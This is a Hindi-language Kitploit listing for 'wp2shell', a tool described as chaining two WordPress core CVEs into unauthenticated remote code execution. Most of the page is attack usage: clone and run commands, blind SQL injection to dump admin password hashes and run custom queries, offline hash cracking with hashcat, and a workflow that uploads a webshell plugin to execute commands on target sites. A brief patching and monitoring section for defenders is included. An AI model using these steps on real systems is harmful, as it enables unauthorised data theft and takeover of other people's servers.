Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell — CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi) | Kitploit
उपकरण/GitHubGitHub/ekomssavior/wp2shell
पासवर्ड क्रैकिंगपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubekomssavior/wp2shell

wp2shell

CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi)

रिपॉजिटरी देखें
82171 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

wp2shell द्वारा: ek0ms savi0r

WordPress Core POC (CVE-2026-63030 + CVE-2026-60137) के लिए बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन

wp2shell WordPress कोर में एक महत्वपूर्ण भेद्यता श्रृंखला के लिए शोषण। यह REST API बैच रूट कन्फ्यूज़न बग को WP_Query में SQL इंजेक्शन के साथ जोड़कर असुरक्षित WordPress इंस्टॉलेशन पर बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन प्राप्त करता है।

विवरणजानकारी
CVECVE-2026-63030 (REST बैच रूट कन्फ्यूज़न) + CVE-2026-60137 (author__not_in SQLi)
प्रभावितWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
पैच किए गए6.9.5, 7.0.2
प्रमाणीकरण आवश्यककोई नहीं — बिना प्रमाणीकरण के
CVSSगंभीर (RCE श्रृंखला)
खोजकर्ताAdam Kues (Assetnote / Searchlight Cyber)
निर्भरताPython 3.8+ — केवल मानक पुस्तकालय

यह कैसे काम करता है

शोषण WordPress कोर में दो बगों को जोड़ता है:

  1. CVE-2026-60137 — SQL इंजेक्शन – जब author__not_in को ऐरे के बजाय स्ट्रिंग के रूप में पारित किया जाता है, तो WordPress is_array() सैनिटाइज़ेशन गार्ड को छोड़ देता है और कच्चे मान को NOT IN (...) SQL क्लॉज़ में सम्मिलित करता है।

  2. CVE-2026-63030 — बैच रूट कन्फ्यूज़न – /wp-json/batch/v1 एंडपॉइंट समानांतर $matches और $validation ऐरे बनाता है। एक दोषपूर्ण उप-अनुरोध को $validation में जोड़ा जाता है लेकिन $matches में नहीं, जिससे +1 इंडेक्स शिफ्ट होता है। उप-अनुरोध i को उप-अनुरोध i+1 के हैंडलर के साथ भेजा जाता है।

एक श्रृंखला में जुड़े: POST /wp/v2/posts अनुरोध जिसमें एक आंतरिक GET /wp/v2/users अनुरोध author_exclude स्ट्रिंग के साथ होता है, दोनों विधि अनुमति-सूची और इनपुट सैनिटाइज़ेशन को बायपास करता है। स्ट्रिंग WP_Query तक author__not_in के रूप में पहुँचती है और SQL में सम्मिलित हो जाती है — जिससे आपको बिना प्रमाणीकरण के ब्लाइंड SQL इंजेक्शन मिलता है।

वहाँ से, उपकरण यह कर सकता है:

  • प्रशासक पासवर्ड हैश निकालें
  • प्रशासक के रूप में प्रमाणित करें (एक बार हैश क्रैक होने पर)
  • एक दुर्भावनापूर्ण प्लगइन अपलोड करें
  • मनमानी सिस्टम कमांड निष्पादित करें

सुविधाएँ


स्थापना

root@kitploit:~
git clone https://github.com/ekomsSavior/wp2shell.git
cd wp2shell
chmod +x wp2shell.py

बस इतना ही। किसी तृतीय-पक्ष पैकेज की आवश्यकता नहीं है।


उपयोग

root@kitploit:~
./wp2shell.py <url> [command] [options]

इंटरएक्टिव मोड (मेनू-संचालित)

root@kitploit:~
./wp2shell.py http://target.com

एक इंटरएक्टिव मेनू लॉन्च करता है जिसमें सभी कार्यक्षमता क्रमांकित विकल्पों के माध्यम से उपलब्ध होती है।

कमांड

check — भेद्यता की पुष्टि करें (सुरक्षित)

समय-विलंब जांच करता है ताकि शोषण की पुष्टि हो सके। कोई डेटा नहीं पढ़ता और कुछ भी नहीं बदलता।

root@kitploit:~
./wp2shell.py http://target.com check

read — डेटा निकालें (ब्लाइंड SQL इंजेक्शन)

समय-आधारित ब्लाइंड SQL इंजेक्शन का उपयोग करके डेटाबेस से जानकारी निकालता है।

root@kitploit:~
# सर्वर फिंगरप्रिंट (संस्करण, डेटाबेस, उपयोगकर्ता)
./wp2shell.py http://target.com read

# उपयोगकर्ता लॉगिन और पासवर्ड हैश निकालें
./wp2shell.py http://target.com read --users

# डेटाबेस नाम निकालें
./wp2shell.py http://target.com read --database

# MySQL संस्करण निकालें
./wp2shell.py http://target.com read --version

# कस्टम SQL क्वेरी
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — दूरस्थ कोड निष्पादन

वैध प्रशासक क्रेडेंशियल आवश्यक हैं। SQL इंजेक्शन पासवर्ड हैश को पुनर्प्राप्त कर सकता है, लेकिन आपको पुनर्प्राप्त सादा पाठ पासवर्ड प्रदान करना होगा।

root@kitploit:~
# एकल कमांड निष्पादित करें
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# एकल कमांड निष्पादित करें (संक्षिप्त रूप)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

विकल्प


उदाहरण कार्यप्रवाह

root@kitploit:~
# 1. जाँचें कि लक्ष्य असुरक्षित है या नहीं
./wp2shell.py https://example.com check

# 2. प्रशासक पासवर्ड हैश निकालें
./wp2shell.py https://example.com read --users

# 3. हैश को ऑफ़लाइन क्रैक करें (hashcat, john, आदि का उपयोग करके)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. पुनर्प्राप्त पासवर्ड के साथ एक कमांड निष्पादित करें
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

प्रभावित संस्करण

शाखाप्रभावितठीक किए गए
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (केवल SQLi, कोई RCE नहीं)6.8.6

संस्करण 6.9.0 से पहले के संस्करण पूर्ण RCE श्रृंखला से प्रभावित नहीं हैं।


पता लगाना और शमन

रक्षकों के लिए:

  • तुरंत 6.9.5, 7.0.2 या बाद के संस्करण में अपडेट करें
  • Cloudflare WAF ग्राहक स्वचालित रूप से सुरक्षित हैं
  • Wordfence ग्राहकों के पास फ़ायरवॉल नियम हैं
  • नेस्टेड requests निकायों के साथ POST /wp-json/batch/v1 अनुरोधों की निगरानी करें
  • बैच रूट पर 404 का हमेशा मतलब "पैच किया गया" नहीं होता — इसका मतलब यह भी हो सकता है कि WAF/CDN अनाम REST API पहुंच को अवरुद्ध कर रहा है

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।


क्रेडिट

  • खोज: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (बैच रूट कन्फ्यूज़न): Adam Kues

भेद्यता के बारे में अधिक जानकारी के लिए, Searchlight Cyber research blog देखें।

root@kitploit:~
टूल डाउनलोड करें
सुविधाविवरण
भेद्यता जाँचसुरक्षित समय-विलंब जांच — कोई डेटा नहीं पढ़ता, कुछ भी नहीं बदलता
डेटा निष्कर्षणबाइनरी-खोज अनुकूलन के साथ ब्लाइंड SQL इंजेक्शन कुशल निष्कर्षण के लिए
उपयोगकर्ता हैश डंपwp_users से user_login और user_pass हैश निकालें
दूरस्थ कोड निष्पादनप्रशासक के रूप में प्रमाणित करें, एक वेबशेल प्लगइन अपलोड करें, कमांड निष्पादित करें
इंटरएक्टिव शेलस्थायी कमांड निष्पादन सत्र
रंगीन आउटपुटस्कैन परिणामों के लिए स्पष्ट दृश्य प्रतिक्रिया
कोई निर्भरता नहींकेवल Python के मानक पुस्तकालय का उपयोग करता है
विकल्पविवरण
--userswp_users से user_login और user_pass निकालें
--databaseवर्तमान डेटाबेस नाम निकालें
--versionMySQL संस्करण निकालें
--query "SQL"एक कस्टम SQL क्वेरी निष्पादित करें (ब्लाइंड निष्कर्षण)
--user USERRCE के लिए प्रशासक उपयोगकर्ता नाम
--password PASSRCE के लिए प्रशासक पासवर्ड (सादा पाठ, SQLi के माध्यम से पुनर्प्राप्त)
--cmd CMDवेबशेल के माध्यम से निष्पादित करने के लिए कमांड